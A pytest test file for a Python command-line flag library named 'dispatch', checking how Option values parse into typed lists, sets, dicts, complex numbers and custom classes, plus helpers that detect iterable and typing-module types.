"\"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode",
"if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\",",
"-> AddressText: return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText =",
"= o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign",
"@addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val is",
"if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\",",
"CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName",
"if val is None else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText",
"def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val is",
"if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\",",
"def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None:",
"None if val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return",
"val: AddressTypeName) -> None: self.__addressTypeName = None if val is None else AddressTypeName(val)",
"o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict):",
"dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText =",
"AddressText) -> None: self.__addressText = None if val is None else AddressText(val) @property",
"named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText",
"countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode",
"line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not",
"= o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode =",
"None if val is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\")",
"not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName",
"-> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode =",
"= None if val is None else CountyCode(val) def generateXML(self, name: str =",
"\"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag = doc.tag with",
"o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\")",
"def localityName(self, val: LocalityName) -> None: self.__localityName = None if val is None",
"self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords with typechecking self.addressTypeName",
"isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText",
"SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = (",
"-> None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) )",
"CountryCode) -> None: self.__countryCode = None if val is None else CountryCode(val) @property",
"return self.__addressText @addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if",
"None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None,",
"is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter",
"else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val:",
"is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def",
"@property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) ->",
"LocalityName: return self.__localityName @localityName.setter def localityName(self, val: LocalityName) -> None: self.__localityName = None",
"@countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val is",
"val: PostalCode) -> None: self.__postalCode = None if val is None else PostalCode(val)",
"PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None, *,",
"None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self,",
"o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with",
"-> None: self.__addressText = None if val is None else AddressText(val) @property def",
"self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None: self.__countyCode = None if val",
"o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes",
"typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName",
"o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode",
"if val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return",
"-> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode =",
"with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName =",
"None: self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) ) @property",
"o.countyCode elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName =",
"None if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return",
"= stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property def",
"self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if val",
"is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if",
"val is None else CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str:",
"not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if self.__postalCode",
"None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self,",
"o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\")",
"self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode",
"if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\",",
"val: AddressText) -> None: self.__addressText = None if val is None else AddressText(val)",
"self.__supplementalAddressText = ( None if val is None else SupplementalAddressText(val) ) @property def",
"elif isinstance(o, dict): # Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\")",
"val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter",
"from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\")",
"def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None:",
"-> None: self.__countyCode = None if val is None else CountyCode(val) def generateXML(self,",
"@property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) ->",
"= doc.tag with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText",
"AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode",
"object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName",
"localityName(self, val: LocalityName) -> None: self.__localityName = None if val is None else",
"None if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return",
"= None ): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking",
"StateCode) -> None: self.__stateCode = None if val is None else StateCode(val) @property",
"None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText =",
"Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText = o.addressText self.__supplementalAddressText",
"None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes from",
"countryCode(self, val: CountryCode) -> None: self.__countryCode = None if val is None else",
"postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode",
"= o.get(\"stateCode\") self.postalCode = o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: #",
"= None, addressText: AddressText = None, supplementalAddressText: SupplementalAddressText = None, localityName: LocalityName =",
"self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords",
"organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode:",
"dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText = None, supplementalAddressText:",
"None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is",
"\"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText:",
"self.__postalCode = o.postalCode self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): #",
"is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if",
"from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText =",
"CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign",
"self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None:",
"is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None: line(\"StateCode\", self.__stateCode) if",
"is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not None: line(\"CountyCode\", self.__countyCode) return",
"supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText",
"None: self.__localityName = None if val is None else LocalityName(val) @property def stateCode(self)",
"-> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName =",
"None if val is None else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName:",
"Assign attributes from dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText",
"SupplementalAddressText = None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode",
"None: self.__postalCode = None if val is None else PostalCode(val) @property def countryCode(self)",
"line(\"PostalCode\", self.__postalCode) if self.__countryCode is not None: line(\"CountryCode\", self.__countryCode) if self.__countyCode is not",
"-> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode =",
"o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode = o.countryCode",
"def countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None:",
"None, localityName: LocalityName = None, stateCode: StateCode = None, postalCode: PostalCode = None,",
"if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode: return self.__countryCode",
"postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is None else",
"__supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def",
"__postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict = None,",
"self.countryCode = countryCode self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName",
"supplementalAddressText self.localityName = localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode",
"None: line(\"StateCode\", self.__stateCode) if self.__postalCode is not None: line(\"PostalCode\", self.__postalCode) if self.__countryCode is",
"countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName)",
"self.countyCode = countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self,",
"yattag import Doc from .SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode,",
".SimpleContent import ( AddressText, AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class",
"val is None else StateCode(val) @property def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter",
"@supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if val",
") class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName: AddressTypeName",
"o.get(\"postalCode\") self.countryCode = o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named",
"self.__countryCode = o.countryCode self.__countyCode = o.countyCode elif isinstance(o, dict): # Assign attributes from",
"self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName self.stateCode",
"None if val is None else CountryCode(val) @property def countyCode(self) -> CountyCode: return",
"self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val",
"self.__countryCode = None if val is None else CountryCode(val) @property def countyCode(self) ->",
"PostalCode) -> None: self.__postalCode = None if val is None else PostalCode(val) @property",
"is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def",
"with tag(name): if self.__addressTypeName is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not",
"@addressText.setter def addressText(self, val: AddressText) -> None: self.__addressText = None if val is",
"CountyCode def __init__( self, o: dict = None, *, addressTypeName: AddressTypeName = None,",
"with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName =",
"None, countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress):",
"OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName = o.addressTypeName self.__addressText =",
"None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is",
"__stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self, o: dict",
"self.__supplementalAddressText) if self.__localityName is not None: line(\"LocalityName\", self.__localityName) if self.__stateCode is not None:",
"Assign attributes from named keywords with typechecking self.addressTypeName = addressTypeName self.addressText = addressText",
"def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc() line =",
"-> None: self.__addressTypeName = None if val is None else AddressTypeName(val) @property def",
"else AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val:",
"= None if val is None else StateCode(val) @property def postalCode(self) -> PostalCode:",
"if val is None else AddressTypeName(val) @property def addressText(self) -> AddressText: return self.__addressText",
"= o.get(\"countryCode\") self.countyCode = o.get(\"countyCode\") else: # Assign attributes from named keywords with",
"= countyCode @property def addressTypeName(self) -> AddressTypeName: return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val:",
"self, o: dict = None, *, addressTypeName: AddressTypeName = None, addressText: AddressText =",
"self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode @property",
"__addressTypeName: AddressTypeName __addressText: AddressText __supplementalAddressText: SupplementalAddressText __localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode:",
"def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None:",
"= None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): # Assign attributes",
"AddressText(val) @property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText)",
"def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is None",
"self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) -> None: self.__supplementalAddressText = ( None if",
"CountyCode(val) def generateXML(self, name: str = \"OrganizationAddress\") -> str: doc = Doc() line",
"countryCode(self) -> CountryCode: return self.__countryCode @countryCode.setter def countryCode(self, val: CountryCode) -> None: self.__countryCode",
"__localityName: LocalityName __stateCode: StateCode __postalCode: PostalCode __countryCode: CountryCode __countyCode: CountyCode def __init__( self,",
"postalCode: PostalCode = None, countryCode: CountryCode = None, countyCode: CountyCode = None ):",
"is not None: line(\"AddressTypeName\", self.__addressTypeName) if self.__addressText is not None: line(\"AddressText\", self.__addressText) if",
"val is None else LocalityName(val) @property def stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter",
"= o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode =",
"def countyCode(self) -> CountyCode: return self.__countyCode @countyCode.setter def countyCode(self, val: CountyCode) -> None:",
"= localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode =",
"stateCode(self, val: StateCode) -> None: self.__stateCode = None if val is None else",
"self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode = o.postalCode self.__countryCode",
"localityName self.stateCode = stateCode self.postalCode = postalCode self.countryCode = countryCode self.countyCode = countyCode",
"typechecking self.addressTypeName = addressTypeName self.addressText = addressText self.supplementalAddressText = supplementalAddressText self.localityName = localityName",
"stateCode(self) -> StateCode: return self.__stateCode @stateCode.setter def stateCode(self, val: StateCode) -> None: self.__stateCode",
"countryCode: CountryCode = None, countyCode: CountyCode = None ): if isinstance(o, OrganizationAddress): #",
"@property def supplementalAddressText(self) -> SupplementalAddressText: return self.__supplementalAddressText @supplementalAddressText.setter def supplementalAddressText(self, val: SupplementalAddressText) ->",
"= None if val is None else PostalCode(val) @property def countryCode(self) -> CountryCode:",
"self.__addressText = o.addressText self.__supplementalAddressText = o.supplementalAddressText self.__localityName = o.localityName self.__stateCode = o.stateCode self.__postalCode",
"self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode",
"AddressTypeName, CountryCode, CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical",
"dictionary with typechecking self.addressTypeName = o.get(\"addressTypeName\") self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName",
"return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if",
"): if isinstance(o, OrganizationAddress): # Assign attributes from object without typechecking self.__addressTypeName =",
"CountyCode, LocalityName, PostalCode, StateCode, SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of",
"self.addressText = o.get(\"addressText\") self.supplementalAddressText = o.get(\"supplementalAddressText\") self.localityName = o.get(\"localityName\") self.stateCode = o.get(\"stateCode\") self.postalCode",
"def postalCode(self) -> PostalCode: return self.__postalCode @postalCode.setter def postalCode(self, val: PostalCode) -> None:",
"self.__countyCode = None if val is None else CountyCode(val) def generateXML(self, name: str",
"= \"OrganizationAddress\") -> str: doc = Doc() line = doc.line tag = doc.tag",
"else SupplementalAddressText(val) ) @property def localityName(self) -> LocalityName: return self.__localityName @localityName.setter def localityName(self,",
"= None if val is None else LocalityName(val) @property def stateCode(self) -> StateCode:",
"@postalCode.setter def postalCode(self, val: PostalCode) -> None: self.__postalCode = None if val is",
"return self.__addressTypeName @addressTypeName.setter def addressTypeName(self, val: AddressTypeName) -> None: self.__addressTypeName = None if",
"None: line(\"AddressText\", self.__addressText) if self.__supplementalAddressText is not None: line(\"SupplementalAddressText\", self.__supplementalAddressText) if self.__localityName is",
"SupplementalAddressText, ) class OrganizationAddress: \"\"\" The physical address of an organization. \"\"\" __addressTypeName:"
] |
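For reference, a minimal usage sketch of the class above. It assumes the SimpleContent wrappers (AddressTypeName, AddressText, and so on) accept plain strings, which is what the property setters rely on when they call, for example, AddressTypeName(val); the literal values are invented for illustration.

# Hypothetical values, for illustration only; any field left unset stays
# None and is skipped by generateXML.
addr = OrganizationAddress(
    addressTypeName="Mailing",
    addressText="123 Main St",
    localityName="Springfield",
    stateCode="VA",
    postalCode="22150",
)
xml = addr.generateXML()
# xml is a single string shaped roughly like:
# <OrganizationAddress><AddressTypeName>Mailing</AddressTypeName>
#   ...<PostalCode>22150</PostalCode></OrganizationAddress>

# The dict path goes through the same typechecking setters:
same = OrganizationAddress({"addressText": "123 Main St", "stateCode": "VA"})

Passing an existing OrganizationAddress instead copies its attributes directly, without re-running the setters.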
# tests/flag_test.py
import pytest
from pytest import raises

import sys
from os.path import dirname

sys.path.insert(0, dirname(dirname(__file__)))

from typing import List, Set, Dict, Sequence, Mapping

from dispatch import command
from dispatch.flags import Option, _from_typing_module, _is_iterable


class AType:
    def __init__(self, val):
        self.val = val


def testTypeParsing():
    o = Option('o', List[int])
    o.setval('[1,2,3,4]')
    assert isinstance(o.value, list)
    for got, want in zip(o.value, [1, 2, 3, 4]):
        assert isinstance(got, int)
        assert isinstance(want, int)
        assert got == want
    o = Option('o', list)
    o.setval('[1,2,3,4]')
    assert isinstance(o.value, list)
    for got, want in zip(o.value, [1, 2, 3, 4]):
        assert isinstance(got, str)
        assert isinstance(want, int)
        assert int(got) == want
        assert got == str(want)
    o = Option('o', Set[float])
    o.setval('[1.5,2.6,3.7,4.8]')
    assert isinstance(o.value, set)
    for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]):
        assert isinstance(got, float)
        assert isinstance(want, float)
        assert got == want
    o = Option('o', Dict[str, int])
    o.setval('{one:1,two:2,three:3}')
    assert isinstance(o.value, dict)
    for k, v in o.value.items():
        assert isinstance(k, str)
        assert isinstance(v, int)
    opt = Option('num', complex)
    opt.setval('5+9j')
    assert opt.value == complex(5, 9)
    opt.setval(complex(7, 2))
    assert opt.value == complex(7, 2)
    opt.setval(6.7)
    assert opt.value == complex(6.7, 0)
    opt = Option('type', AType)
    opt.setval('hello')
    assert isinstance(opt.value, AType)
    assert opt.value.val == 'hello'


def testBadTypeParsing():
    o = Option('outout', Dict[str, float])
    opt = Option('num', complex)

    @command
    def f(keys: Dict[str, float]):
        pass

    with raises(ValueError):
        o.setval('{one:1.0,two:2.5,three:the third number,four:4}')
        opt.setval('4+3i')
        f(['--keys', '{one:1,two:this is the number two}'])


def testIsIterable():
    assert _is_iterable(str)
    assert _is_iterable(list)
    assert _is_iterable(dict)
    assert _is_iterable(set)
    assert _is_iterable(List)
    assert _is_iterable(Dict)
    assert _is_iterable(Sequence)
    assert _is_iterable(Mapping)

    class A: pass  # noqa
    assert not _is_iterable(int)
    assert not _is_iterable(float)
    assert not _is_iterable(A)
    assert _is_iterable([1, 2, 3])


def testFromTypingModule():
    assert _from_typing_module(List)
    assert _from_typing_module(Sequence)
    assert _from_typing_module(Dict[int, str])
    assert not _from_typing_module(list)
    assert not _from_typing_module(int)
    assert not _from_typing_module(dict)

    class A: pass  # noqa
    assert not _from_typing_module(A)
"assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass #",
"opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt = Option('type',",
"assert _from_typing_module(List) assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int)",
"AType: def __init__(self, val): self.val = val def testTypeParsing(): o = Option('o', List[int])",
"isinstance(k, str) assert isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value ==",
"import pytest from pytest import raises import sys from os.path import dirname sys.path.insert(0,",
"dispatch.flags import Option, _from_typing_module, _is_iterable class AType: def __init__(self, val): self.val = val",
"o = Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in",
"Dict, Sequence, Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable",
"_is_iterable class AType: def __init__(self, val): self.val = val def testTypeParsing(): o =",
"Sequence, Mapping from dispatch import command from dispatch.flags import Option, _from_typing_module, _is_iterable class",
"assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt =",
"got, want in zip(o.value, [1, 2, 3, 4]): assert isinstance(got, int) assert isinstance(want,",
"set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float)",
"isinstance(v, int) opt = Option('num', complex) opt.setval('5+9j') assert opt.value == complex(5, 9) opt.setval(complex(7,",
"9) opt.setval(complex(7, 2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7,",
"assert _from_typing_module(Sequence) assert _from_typing_module(Dict[int, str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not",
"float) assert got == want assert got == want o = Option('o', Dict[str,",
"_from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass # noqa assert",
"o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value,",
"int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str)",
"assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not _is_iterable(int) assert",
"4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got == want assert got",
"isinstance(o.value, set) for got, want in zip(o.value, [1.5, 2.6, 3.7, 4.8]): assert isinstance(got,",
"isinstance(want, float) assert got == want assert got == want o = Option('o',",
"isinstance(got, float) assert isinstance(want, float) assert got == want assert got == want",
"List, Set, Dict, Sequence, Mapping from dispatch import command from dispatch.flags import Option,",
"assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa assert not",
"opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt = Option('num',",
"= Option('outout', Dict[str, float]) opt = Option('num', complex) @command def f(keys: Dict[str, float]):",
"two}']) def testIsIterable(): assert _is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List)",
"f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is",
"assert int(got) == want assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]')",
"with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i') f(['--keys', '{one:1,two:this is the number two}']) def",
"raises import sys from os.path import dirname sys.path.insert(0, dirname(dirname(__file__))) from typing import List,",
"int) assert got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list)",
"opt = Option('num', complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the",
"got == want o = Option('o', list) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got,",
"2)) assert opt.value == complex(7, 2) opt.setval(6.7) assert opt.value == complex(6.7, 0) opt",
"pass # noqa assert not _is_iterable(int) assert not _is_iterable(float) assert not _is_iterable(A) assert",
"str]) assert not _from_typing_module(list) assert not _from_typing_module(int) assert not _from_typing_module(dict) class A: pass",
"assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence) assert _is_iterable(Mapping) class A: pass # noqa",
"AType) assert opt.value.val == 'hello' def testBadTypeParsing(): o = Option('outout', Dict[str, float]) opt",
"str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want in",
"[1.5, 2.6, 3.7, 4.8]): assert isinstance(got, float) assert isinstance(want, float) assert got ==",
"assert got == str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for",
"== str(want) o = Option('o', Set[float]) o.setval('[1.5,2.6,3.7,4.8]') assert isinstance(o.value, set) for got, want",
"complex(6.7, 0) opt = Option('type', AType) opt.setval('hello') assert isinstance(opt.value, AType) assert opt.value.val ==",
"= Option('o', Dict[str, int]) o.setval('{one:1,two:2,three:3}') assert isinstance(o.value, dict) for k, v in o.value.items():",
"assert isinstance(got, float) assert isinstance(want, float) assert got == want assert got ==",
"assert isinstance(o.value, dict) for k, v in o.value.items(): assert isinstance(k, str) assert isinstance(v,",
"self.val = val def testTypeParsing(): o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list)",
"complex) @command def f(keys: Dict[str, float]): pass with raises(ValueError): o.setval('{one:1.0,two:2.5,three:the third number,four:4}') opt.setval('4+3i')",
"float) assert isinstance(want, float) assert got == want assert got == want o",
"_is_iterable(float) assert not _is_iterable(A) assert _is_iterable([1, 2, 3]) def testFromTypingModule(): assert _from_typing_module(List) assert",
"o = Option('o', List[int]) o.setval('[1,2,3,4]') assert isinstance(o.value, list) for got, want in zip(o.value,",
"_is_iterable(str) assert _is_iterable(list) assert _is_iterable(dict) assert _is_iterable(set) assert _is_iterable(List) assert _is_iterable(Dict) assert _is_iterable(Sequence)",
